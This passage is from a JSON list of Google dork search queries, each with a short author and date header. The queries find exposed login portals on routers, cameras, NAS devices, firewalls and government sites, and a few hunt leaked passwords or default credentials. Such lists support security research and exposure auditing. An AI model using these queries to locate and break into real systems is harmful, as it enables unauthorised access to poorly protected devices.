editor\" OR intext:\"Password : any\"\r\n# Vue Element Admin login pages with default credentials.\r\n#Author: Naveen Prakaasham K S V"}, {"dork": "intitle:\"web admin login\" \"Huawei Technologies\"", "description": "# Google Dork: intitle:\"web admin login\" \"Huawei Technologies\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login - Hitron technologies\"", "description": "# Google Dork: intitle:\"Login - Hitron technologies\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Video web server\" \"login\"", "description": "# Google Dork: intitle:\"Video web server\" \"login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"vigor login page\"", "description": "# Google Dork: intitle:\"vigor login page\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:prweb/PRAuth", "description": "# Google Dork: inurl:prweb/PRAuth\r\n# Date: 6/30/2020\r\n# Exploit Author: Javier Bernardo\r\n# Pega Platform Login Pages"}, {"dork": "intext:\"developed and maintained by Netgate\" intitle:login", "description": "# Google Dork: intext:\"developed and maintained by Netgate\" intitle:login\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"system login\" \"Drake Holdings\"", "description": "# Google Dork: intitle:\"system login\" \"Drake Holdings\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:mailscanner intitle:\"mailwatch login page\"", "description": "# Google Dork: inurl:mailscanner intitle:\"mailwatch login page\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:device_status.html \"login\"", "description": "# Google Dork: inurl:device_status.html \"login\"\r\n# Category: Various Online Devices\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"DEVICE\" \"Real-time IP Camera Monitoring System\"", "description": "# Google Dork: intitle:\"DEVICE\" \"Real-time IP Camera Monitoring System\"\r\n# Category: Various Online Devices\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:openam/XUI", "description": "# Google Dork: inurl:openam/XUI\r\n# Category: Pages Containing Login Portals\r\n# Dork Author: Nijin K"}, {"dork": "intitle:\"Mail2000 Message System\" \"Openfind Information\"", "description": "# Google Dork: intitle:\"Mail2000 Message System\" \"Openfind Information\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:\"serverpush.htm\" intext:\"Foscam\"", "description": "#Google Dork: inurl:\"serverpush.htm\" intext:\"Foscam\"\r\n# Various Online Devices\r\n# Date: 28/06/2021\r\n#Exploit Author: Neha Singh\r\n\r\n\r\n\r\n\r\n\r\n\r\nThanks and Regards\r\n Neha Singh"}, {"dork": "inurl:auth/login?returnUrl", "description": "Pages Containing Login Portals\r\n# Google Dork: inurl:auth/login?returnUrl\r\n# Date: 6/25/2020\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"Login\" intext:\"IP Surveillance for Your Life\"", "description": "# Google Dork: intitle:\"Login\" intext:\"IP Surveillance for Your Life\"\r\n# Pages Containing Login Portals\r\n# Date: 12/07/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"R WebServer\"", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"login\" inurl:\"idp/profile/login\"", "description": "# Google Dork: intitle:\"login\" inurl:\"idp/profile/login\"\r\n# Pages Containing Login Portals\r\n# Date: 14/07/2021 \r\n# Exploit Author: Abhijit Gaikwad"}, {"dork": "inurl:ui3.htm", "description": "# Google Dork: inurl:ui3.htm\r\n# Various online devices\r\n# Date: 18/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "inurl:oauth2/v2.0/authorize", "description": "# Google Dork: inurl:oauth2/v2.0/authorize\r\n# Date: 7/22/2020\r\n# Exploit Author: Javier Bernardo"}, {"dork": "\"Network State: Network Ready. Network Channel:\" intitle:ACEManager", "description": "# Google Dork: Network State: Network Ready. Network Channel: intitle:ACEManager\r\n# Date: 2021-06-28\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:\"admin/public/login\"", "description": "# Google Dork: inurl:\"admin/public/login\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "inurl:\"pis/login.aspx\"", "description": "# Google Dork: inurl:\"pis/login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:\"Login to Frappe\" +\"Forgot Password?\" +\"Reset Password\" inurl:login -intitle:\"My utm\"", "description": "# Google Dork: intext:\"Login to Frappe\" +\"Forgot Password?\" +\"Reset Password\" inurl:login -intitle:\"My utm\" \r\n# Pages Containing Login Portals\r\n# Date: 29/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"weblogic\" login intext:\"footer powered by\"", "description": "# Google Dork: intitle:\"weblogic\" login intext:\"footer powered by\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Webmail Login\" intext:\"cPanel, L.L.C. \" +\"Change locale\"", "description": "# Google Dork: intitle:\"Webmail Login\" intext:\"cPanel, L.L.C. \" +\"Change locale\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"Powered by Deepija Telecom\"", "description": "# Google Dork: intitle:\"Powered by Deepija Telecom\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"idrac7 - Login\" inurl:login.html", "description": "# Google Dork: intitle:\"idrac7 - Login\" inurl:login.html\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"ovislink\" inurl:login intext:\"My Resource\"", "description": "# Google Dork: intitle:\"ovislink\" inurl:login intext:\"My Resource\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Web Viewer for Samsung DVR\"", "description": "# Google Dork: intitle:\"Web Viewer for Samsung DVR\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Web Viewer\" inurl:auth_index.htm", "description": "# Google Dork: intitle:\"Web Viewer\" inurl:auth_index.htm\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Asus Login\" inurl:Main_Login.asp", "description": "# Google Dork: intitle:\"Asus Login\" inurl:Main_Login.asp\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Wireless router\" inurl:login.htm -.com|ca", "description": "# Google Dork: intitle:\"Wireless router\" inurl:login.htm -.com|ca\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Synology Disk Station\" intext:\"System administrator\" \"login\"", "description": "# intitle:\"Synology Disk Station\" intext:\"System administrator\" \"login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"SonicWall Network Security Login\"", "description": "# Google Dork: intitle:\"SonicWall Network Security Login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Seagate NAS -\" \"login\" intext:\"Language.\" -.com", "description": "# Google Dork: intitle:\"Seagate NAS -\" \"login\" intext:\"Language.\" -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Prolink\" inurl:login.htm -.com", "description": "# Google Dork: intitle:\"Prolink\" inurl:login.htm -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"prestige\" intext:\"Enter Password and click Login\" -.com", "description": "# Google Dork: intitle:\"prestige\" intext:\"Enter Password and click Login\" -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"PBX Login\" -inurl:pbx|pbxlogin -.com", "description": "# Google Dork: intitle:\"PBX Login\" -inurl:pbx|pbxlogin -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Mitel Standard Linux: Login Page\"", "description": "# Google Dork: intitle:\"Mitel Standard Linux: Login Page\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"ManageEngine ServiceDesk Plus\" \"domain\" intext:\"ManageEngine ServiceDesk Plus\" -.com", "description": "# Google Dork: intitle:\"ManageEngine ServiceDesk Plus\" \"domain\" intext:\"ManageEngine ServiceDesk Plus\" -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"WEB SERVICE\" \"Modify Admin Password\"", "description": "# Google Dork: intitle:\"WEB SERVICE\" \"Modify Admin Password\"\r\n# Pages Containing Login Portals\r\n# Date: 03/08/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"Lantronix\" intext:\"Lantronix, Inc\" \"login to\" -.com", "description": "# Google Dork: intitle:\"Lantronix\" intext:\"Lantronix, Inc\" \"login to\" -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"LaCie\" \"login\" intext:\"Remember me\" \"Connect to\"", "description": "# Google Dork: intitle:\"LaCie\" \"login\" intext:\"Remember me\" \"Connect to\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login - Ipswitch WhatsUp Professional\"", "description": "# Google Dork: intitle:\"Login - Ipswitch WhatsUp Professional\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login\" inurl:\"view/login.html\" \"Huawei Technologies\"", "description": "# Google Dork: intitle:\"Login\" inurl:\"view/login.html\" \"Huawei Technologies\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 06/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:Login.aspx intitle:\":::Login:::\" \"RM\"", "description": "# Google Dork: inurl:Login.aspx intitle:\":::Login:::\" \"RM\" \r\n# Pages Containing Login Portals\r\n# Date: 05/08/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"IBM iNotes Login\" \"Ultralite Login Screen\"", "description": "# Google Dork: intitle:\"IBM iNotes Login\" \"Ultralite Login Screen\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "Jira login intext:v8.3.2", "description": "# Google Dork: Jira login intext:v8.3.2\r\n# Dork can be changed on target base like *Jira login intext:v*7.0.5 , *Jira login intext:v6.0.3*\r\n# Date: 06/08/2021\r\n# Exploit Author: tamimhasan404"}, {"dork": "intitle:\"Web Admin login\" intext:\"Huawei Technologies\"", "description": "# Google Dork: intitle:\"Web Admin login\" intext:\"Huawei Technologies\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 06/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Log In - Seafile Server\"", "description": "# Google Dork: intitle:\"Log In - Seafile Server\"\r\n# Pages Containing Login Portals\r\n# Date: 20/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"webconsole/webpages/login.jsp\" +intitle:\"Sophos\"", "description": "# Google Dork: inurl:\"webconsole/webpages/login.jsp\" +intitle:\"Sophos\"\r\n# Pages Containing Login Portals\r\n# Date: 09/08/2021 \r\n# Exploit Author: hummerston"}, {"dork": "intitle:\"WHM Login\" intext:\"cPanel, L.L.C. \" +\"Change locale\"", "description": "# Google Dork: intitle:\"WHM Login\" intext:\"cPanel, L.L.C. \" +\"Change locale\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"Honeywell XL Web Controller\" intext:\"systemadmin\"", "description": "# Google Dork: intitle:\"Honeywell XL Web Controller\" intext:\"systemadmin\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 06/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"powered by enboard\" \"portal\"", "description": "# Google Dork: intext:\"powered by enboard\" \"portal\"\r\n# Pages Containing Login Portals\r\n# Date: 26/06/2021 \r\n# Exploit Author: Hindustani Hacker"}, {"dork": "inurl:users/password/new", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Various pages containing forgot password portals\r\n# Date: 23/08/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "intitle:\"BoardPAC - Board Paper and Credit Proposal Management System\"", "description": "# Google Dork: intitle:\"BoardPAC - Board Paper and Credit Proposal Management System\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 26/08/2021\r\n# Exploit Author: Harsh J, Omkar G, Amit C"}, {"dork": "intitle:\"Polycom Login\" inurl:\"/login.html\"", "description": "# Google Dork: intitle:\"Polycom Login\" inurl:\"/login.html\"\r\n# Pages Containing Login Portals\r\n#Date: 27/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intext:\"amcrest\" \"Invalid login credentials\"", "description": "#Google Dork: intext:\"amcrest\" \"Invalid login credentials\"\r\n# Date: 25/06/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intext:\"Powered by Bitnami Redmine Stack\" inurl:/login", "description": "# Google Dork: intext:\"Powered by Bitnami Redmine Stack\" inurl:/login\r\n# Pages Containing Login Portals\r\n# Date: 27/08/2021 \r\n# Exploit Author: Inderjeet Singh"}, {"dork": "Dork:- intitle:*admin (inurl:login)", "description": "# Google Dork: intitle:*admin (inurl:login)\r\n# Pages Containing Login Portals\r\n# Date: 29/08/2021 \r\n# Exploit Author: Durgesh Gupta"}, {"dork": "site:*/JIRA/login", "description": "# Google Dork: site:*/JIRA/login\r\n# Pages Containing Login Portals\r\n# Date: 29/08/2021 \r\n# Exploit Author: Siddesh Sapkal"}, {"dork": "site:gov.in intitle: admin login", "description": "# Google Dork: site:gov.in intitle: admin login\r\n# Pages Containing Login Portals\r\n# Date: 29/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "inurl:login.php site:.nl", "description": "# Google Dork: inurl:login.php site:.nl\r\n# Pages Containing Login Portals\r\n# Date: 29/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "intitle:\"NetBiter\" intext:\"based on NetBiter\" -.com", "description": "# Google Dork: intitle:\"NetBiter\" intext:\"based on NetBiter\" -.com\r\n# Pages Containing Login Portals\r\n# Date: 31/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "site:login.microsoftonline.com -error", "description": "# Google Dork: *site:login.microsoftonline.com\r\n# Pages Containing Login Portals\r\n# Date: 30/08/2021 \r\n# Exploit Author: Brahmaraj Rathod"}, {"dork": "inurl \"/admin/index.php\" username=admin&password=password", "description": "# Google Dork: inurl \"/admin/index.php\" username=admin&password=password\r\n# Pages Containing Login Portals\r\n# Date: 31/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "inurl:/about site:*.in", "description": "# Google Dork: inurl:/about site:*.in\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: Sarthi Shinde"}, {"dork": "inurl:/login site:.in", "description": "# Google Dork: inurl:/login site:.in\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021\r\n# Exploit Author: Sarthi Shinde"}, {"dork": "inurl:\"/userportal/webpages/myaccount/login.jsp\"", "description": "# Google Dork: inurl:\"/userportal/webpages/myaccount/login.jsp\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl /admin/login.php intitle panel admin", "description": "# Google Dork: inurl /admin/login.php intitle panel admin\r\n# Pages Containing Login Portals\r\n# Date: 31/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "site:*/admin.php inurl:files", "description": "# Google Dork: site:*/admin.php inurl:files\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle:\"TD-W9970\" intext:\"Model No. TD-W9970\" -tp-link.com", "description": "# Google Dork: intitle:\"TD-W9970\" intext:\"Model No. TD-W9970\" -tp-link.com\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:login/forgotten", "description": "# Google Dork: inurl:login/forgotten\r\n# Pages Containing Login Portals\r\n# Date: 31/08/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "intitle:\"Users\" intext:\"Read License\" intext:\"vtiger.com\"", "description": "# Google Dork: intitle:\"Users\" intext:\"Read License\" intext:\"vtiger.com\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intext:\"Please enter the device's administrator password\"", "description": "# Google Dork: intext:\"Please enter the device's administrator password\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/09/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Router Access\" inurl:Router_Login.asp", "description": "# Google Dork: intitle:\"Router Access\" inurl:Router_Login.asp\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"IP CAMERA\" \"User Login\" \"User Name\" \"Password\" \"Preview Stream\"", "description": "# Google Dork: intitle:\"IP CAMERA\" \"User Login\" \"User Name\" \"Password\" \"Preview Stream\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "site:\".edu\" intitle:\"admin login\"", "description": "# Google Dork: site:\".edu\" intitle:\"admin login\"\r\n# Pages Containing Login Portals\r\n# Date: 02/09/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "Inurl:login.rsp \"User name\"", "description": "# Google Dork: inurl:login.rsp \"User name\"\r\n# Pages Containing Login Portals\r\n# Date: 22/07/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"fdt\" intext:\"Remember me\" \"Username\"", "description": "# Google Dork: intitle:\"fdt\" intext:\"Remember me\" \"Username\"\r\n# Pages Containing Login Portals \r\n# Date: 02/09/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "site:\".uk\" intitle:\"admin login\"", "description": "# Google Dork: site:\".uk\" intitle:\"admin login\"\r\n# Pages Containing Login Portals\r\n# Date: 02/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "intext:\"Welcome to ZXHN H198A\"", "description": "# Google Dork: intext:\"Welcome to ZXHN H198A\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "site:\".ae\" intitle:\"admin login\"", "description": "# Google Dork: site:\".ae\" intitle:\"admin login\"\r\n# Pages Containing Login Portals\r\n# Date: 02/09/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "site:\".au\" intitle:\"admin login\"", "description": "# Google Dork: site:\".au\" intitle:\"admin login\"\r\n# Pages Containing Login Portals\r\n# Date: 02/09/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "\"Desktop\" \"Simple\" \"Responsive\" intitle:\"Controllr\"", "description": "# Google Dork: \"Desktop\" \"Simple\" \"Responsive\" intitle:\"Controllr\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "/inurl:upload site:doxbin.org ~password", "description": "# Google Dork: inurl:upload site:doxbin.org ~password\r\n# Pages Containing Login Portals\r\n# Date: 04/08/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "cms +inurl:login +site:\"gov.in\"", "description": "# Google Dork: cms +inurl:login +site:\"gov.in\"\r\n# Pages Containing Login Portals\r\n# Date: 04/08/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "intitle:\"WATTrouter\" \"SYSTEM WEB INTERFACE\"", "description": "# Google Dork: intitle:\"WATTrouter\" \"SYSTEM WEB INTERFACE\"\r\n# Various Online Devices\r\n# Date: 04/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:(\"administrator/login.aspx\" OR \"admin/login.aspx\") +site:.com", "description": "# Google Dork: inurl:(\"administrator/login.aspx\" OR \"admin/login.aspx\") +site:.com\r\n# Pages Containing Login Portals\r\n# Date: 04/09/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "intext:\"Atlassian Jira Project Management Software\" Jira login", "description": "# Google Dork: intext:\"Atlassian Jira Project Management Software\" Jira login\r\n# Pages Containing Login Portals\r\n# Date: 04/09/2021 \r\n# Exploit Author: KnoxPro BugHunter"}, {"dork": "intext:\"Admin Login\" inurl:\"/login.aspx\"", "description": "# Google Dork: intext:\"Admin Login\" inurl:\"/login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "intitle:\"Gitea\" \"This website works better with JavaScript\" \"sign in\" \" Home\" \"Explore\"-.com", "description": "# Google Dork: intitle:\"WATTrouter\" \"SYSTEM WEB INTERFACE\"\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"F660\" intext:\"ZTE Corporation. All rightsreserved.\"", "description": "# Google Dork: intitle:\"F660\" intext:\"ZTE Corporation. All rights reserved.\"\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021\r\n# Exploit Author: Herve Yao Nyhl"}, {"dork": "intitle:\"MultiView\" \"MultiView Events\" \"MOBOTIX\"", "description": "# Google Dork: intitle:\"MultiView\" \"MultiView Events\" \"MOBOTIX\"\r\n# Various Online Devices.\r\n# Date: 6/09/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:login intext:\"Powered by Plone & Python\" -plone.org", "description": "# Google Dork: inurl:login intext:\"Powered by Plone & Python\" -plone.org\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"/bitrix/admin/\" intitle:\"Autorisation\"", "description": "# Google Dork: inurl:\"/bitrix/admin/\" intitle:\"Autorisation\"\r\n# Pages Containing Login Portals\r\n# Date: 07/09/2021\r\n# Exploit Author: Herve Yao Nyhl"}, {"dork": "inurl /admin/login intitle panel admin site:\"*.in\"", "description": "# Google Dork: inurl /admin/login intitle panel admin site:\"*.in\"\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021 \r\n# Exploit Author: Sarthi Shinde"}, {"dork": "intitle:\"admin panel\" OR intitle:\"request password\" intext:\"email address\"", "description": "# Exploit Title: intitle:\"admin panel\" OR intitle:\"request password\" intext:\"email address\"\r\n# Date: 07/09/2021\r\n# Exploit Author: Gonzalo Carrasco"}, {"dork": "intitle:\"admin login\" site:.gov", "description": "# Google Dork: intitle:\"admin login\" site:.gov\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"faculty login\"", "description": "# Google Dork: intitle:\"faculty login\"\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "site:wiki.*.com inurl:login.action", "description": "# Google Dork: site:wiki.*.com inurl:login.action\r\n# Pages Containing Login Portals\r\n# Date: 07/09/2021 \r\n# Exploit Author: Brahmaraj Rathod"}, {"dork": "inurl:login_fail.asp", "description": "# Google Dork: J. Igor Melo\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "\"Welcome to Polycom Web Configuration Utility\" \"Login as\" \"Password\"", "description": "# Google Dork: \"Welcome to Polycom Web Configuration Utility\" \"Login as\" \"Password\"\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"MedDream\" \"Softneta\" -.com", "description": "# Google Dork: intitle:\"MedDream\" \"Softneta\" -.com\r\n# Pages Containing Login Portals\r\n# Date: 09/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"TestRail\" inurl:\"/index.php?/auth/login/\"", "description": "# Google Dork: intitle:\u201dTestRail\u201d inurl:\u201d/index.php?/auth/login/\u201c\r\n# Pages Containing Login Portals\r\n# Date: 06/09/2021 \r\n# Exploit Author: Vismit Rakhecha"}, {"dork": "\"Username\" \"Password\" \"This system is for authorized use only.\" intitle:\"Gaia\"", "description": "# Google Dork: \"Username\" \"Password\" \"This system is for authorized use only.\" intitle:\"Gaia\"\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:(\"admin/password.php\") +site:.com", "description": "# Google Dork: inurl:(\"admin/password.php\") +site:.com\r\n# Pages Containing Login Portals\r\n# Date: 09/09/2021 \r\n# Exploit Author: Sanjay Singh"}, {"dork": "intitle:\"admin login\" site:.gov", "description": "# Google Dork: intitle:\"admin login\" site:.gov\r\n# Pages Containing Login Portals\r\n# Date: 09/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"faculty login\"", "description": "# Google Dork: intitle:\"faculty login\"\r\n# Pages Containing Login Portals\r\n# Date: 09/09/2021 \r\n# Exploit Author: Aftab Alam"}, {"dork": "cms inurl:login site:\"gov.ae\"", "description": "# Google Dork: cms inurl:login site:\"gov.ae\"\r\n# Pages Containing Login Portals\r\n# Date: 12/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "site:.com inurl:(\"administrator/login.php\" OR \"admin/login.php\")", "description": "# Google Dork: site:.com inurl:(\"administrator/login.php\" OR \"admin/login.php\")\r\n# Pages Containing Login Portals\r\n# Date: 10/09/2021 \r\n# Exploit Author: Madan Kumawat"}, {"dork": "intitle:\"D-link\" intext:\"SharePort Web Access\" \"Hardware Version\" \"Firmware Version\"", "description": "# Google Dork: intitle:\"D-link\" intext:\"SharePort Web Access\" \"Hardware Version\" \"Firmware Version\"\r\n# Pages Containing Login Portals\r\n# Date: 10/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:destination=portals", "description": "# Google Dork: inurl:destination=portals\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "Pages Containing Login Portals", "description": "#Google Dork: intitle:\"admin login\" site:.pk\r\n#Pages Containing Login Portals\r\n#Date: 11/09/2021\r\n#Exploit Author: Bilal Qureshi"}, {"dork": "site:pastebin.com intext:\"password\" | intitle:\"password\"", "description": "# Google Dork: site:pastebin.com intext:\"password\" | intitle:\"password\"\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2021 \r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"Zimbra Web Client Sign In\" \"Synacor\"", "description": "# Google Dork: intitle:\"Zimbra Web Client Sign In\" \"Synacor\"\r\n# Pages Containing Login Portals\r\n# Date: 12/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"login\" \"Clare Controls LLC\"", "description": "# Google Dork: intitle:\"login\" \"Clare Controls LLC\"\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "site:\".om\" intitle:\"login\"", "description": "# Google Dork: site:\".om\" intitle:\"login\"\r\n# Pages Containing Login Portals\r\n# Date: 14/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "intitle:\"admin login\" site:.net", "description": "# Google Dork: intitle:\"admin login\" site:.net\r\n# Pages Containing Login Portals\r\n# Date: 12/09/2021 \r\n# Exploit Author: Priya Dalal"}, {"dork": "intitle:\"admin login\" site:.org", "description": "# Google Dork: intitle:\"admin login\" site:.org\r\n# Pages Containing Login Portals\r\n# Date: 13/09/2021\r\n# Exploit Author: Bhavin Amesara"}, {"dork": "intitle:\"Login - splunk\"", "description": "# Google Dork: intitle:\"Login - splunk\"\r\n# Pages Containing Login Portals\r\n# Date: 14/09/2021 \r\n# Exploit Author:Saiju Pillai"}, {"dork": "intitle:\"oracle login\" site:.gov", "description": "# Google Dork: intitle:\"oracle login\" site:.gov\r\n# Pages Containing Login Portals\r\n# Date: 14/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "inurl:employee-login.html", "description": "# Google Dork: inurl:employee-login.html\r\n# Pages Containing Login Portals\r\n# Date: 14/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "inurl:login intext:\" fiesta login\"", "description": "# Google Dork: inurl:login intext:\" fiesta login\"\r\n# Pages Containing Login Portals\r\n# Date: 15/09/2021 \r\n# Exploit Author: Saiju Pillai"}, {"dork": "intitle:\"admin login\" site:.in", 